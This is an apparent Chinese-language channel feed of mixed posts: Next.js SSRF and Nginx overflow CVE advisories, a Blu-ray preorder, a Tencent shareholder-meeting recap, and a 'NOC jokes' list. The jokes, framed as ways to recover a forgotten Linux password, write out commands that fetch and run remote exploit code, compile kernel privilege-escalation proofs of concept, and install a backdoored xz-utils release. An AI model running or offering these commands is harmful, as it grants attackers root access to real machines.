我不行了，这个 Synapse 坏事做尽（
有没有什么可以迁移的服务端实现？

#今天被推送到DSv4识图模式了吗

没有

#碎碎念 #前端 #安全 #新动态
看乐了，还好我已经远离 Next.js 了

CVE-2026-44578 

CVE-2026-44578 
⚠️ Next.js – WebSocket Upgrade SSRF (CVSS 8.6) 

A server-side request forgery vulnerability in Next.js allows unauthenticated attackers to force self-hosted instances to make internal HTTP requests via the WebSocket upgrade handler. 
By sending a crafted absolute-form HTTP request with Upgrade: websocket headers, attackers can access internal services, cloud metadata endpoints, admin panels, and internal APIs reachable from the Next.js server on port 80. Successful exploitation may expose cloud credentials, API keys, secrets, and configuration data. 

Affected: Next.js 13.4.13+, 14.x, 15.x <15.5.16, 16.0.0–16.2.4 

Mitigation: Upgrade immediately to 15.5.16 or 16.2.5.  

Modat Magnify Query: 
technology="Next.js" 

The platform: 
https://magnify.modat.io/ 

#threatintel #vulnerability #CVE202644578 #Nextjs #SSRF #WebSocket #CloudSecurity #infosec #Critical #ModatMagnify

最近 CVE 好 热 闹 啊

这集神了
点我一键巡礼

这次特朗普访华的名单我看了，我们频道没有一个人在里面！那份名单！我翻来覆去看了三遍！我们频道，全军覆没！一个都没有！一个都没有啊！！！希望大家多做些有意义的事情，而不是整天虚度光阴！特朗普来了，你们这些顶尖人才连个边都没摸到？一个个人五人六的，就这能力？就这？我太失望了，真的太失望了！从今天开始，都给我支棱起来！下次再有这种国际级场合，我不要求你们都上名单，但至少，至少！要让所有人知道我们收到了邀请！！！

《超时空辉夜姬！》Blu-ray 开始予約受付！
> 9月9日 (水) 发售！

两个版本，差异见图

官网商城 5月14日(木) 22:00 JST / 21:00 BJT 开放预定，其余商城已经开放预定
官网商城已售罄，其他渠道也已有几个售罄的了，有需要的建议早点预定
特装限定版已全网售罄，普通版仍有货

官网情报 | 官网蓝光专题页

马化腾：一年前以为上了AI的船，结果漏水了
作为腾讯老登的迷你股东，来四季酒店参加腾讯的股东大会，还是很欣赏管理层踏实的风格。
 
当初看中的腾讯的稳扎稳打，社交、游戏的护城河，以及注重生态融合与应用落地，最重要的是觉得腾讯的估值已经来到了相当合理的水平。
 
但是腾讯AI的进展确实差强人意，今天投资者们也是格外关注AI话题，提了很多相关问题，管理层很耐心做了解答，但总感觉底气不足，对AI的应用可能有一些方向，但是尚无特别明确的一些落地计划，甚至内部还在赛马中。马总也坦言：“一年前以为上了AI的船，结果发现漏水了，现在虽然能站稳了但还是坐不下去。AI线路要结合自身优势稳扎稳打，不能乱抢地盘”。所谓自身优势，无非就是游戏和微信了，不知道目前进度如何，未来在微信入口、内容推荐和商业变现会有何进展，也拭目以待了。
 
另外听管理层的发言，似乎对workbuddy非常肯定，非常看好这个效率智能体。会后看Q1财报，workbuddy是同类工具日活第一，留存率也高。主包只用过openclaw和飞书claw，有用过workbuddy的朋友说说到底好用吗？
 
另外还有2个彩蛋！一是离开酒店的时候和马总擦身而过，妥妥高富帅、好有气质、看不出是50多岁的人。二是之前听说鹅很抠，股东大会没有伴手礼和茶歇，这次居然还送了个小企鹅～

某网友

https://lantian.pub/article/fun/ai-agent-bankrupted-their-operator-scan-dn42lantian.lantian/

AI 如何把你的事情变坏

Lan Tian @ Blog

AI Agent 试图扫描 DN42 时把主人搞破产了 - Lan Tian @ Blog

来点NOC笑话

1. Linux 找回密码教程，建议收藏！
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码

2. 你的 Linux 密码又忘了？
没关系，这里还有一个新的！
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

3. 不想再忘记密码了？
我们有专业的黑客团队帮您运维服务器和保管密码！
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh

4. 容易忘记密码的有福了，每天都有新办法！
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡，让它down掉，然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可

5. 什么，你买不起高端网卡？那试试这个吧！
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

6. 听说您的机房不允许ssh外连，只能通过KVM物理访问服务器? 没关系，我们的专业黑客团队也可以通过nginx帮助运维您的服务器！
https://depthfirst.com/nginx-rift

Nginx 被发现一个存在18年的内存损坏漏洞，可导致远程代码执行，利用门槛低

漏洞存在于每个通用发行版都会包含的rewrite模块 ngx_http_rewrite_module ，影响开原版本Nginx 0.6.27至最近的1.30.0版本，在计算目标缓冲区大小时，使用的是原始字节长度，但在实际写入时，却进行了 URL 转义（ ⁠+⁠ , ⁠%⁠ , ⁠&⁠ 等字符会扩展为 3 倍长度），溢出长度可控导致堆喷射

建议用户尽快更新至 1.30.1 / 1.31.0 版本

Ref: https://depthfirst.com/nginx-rift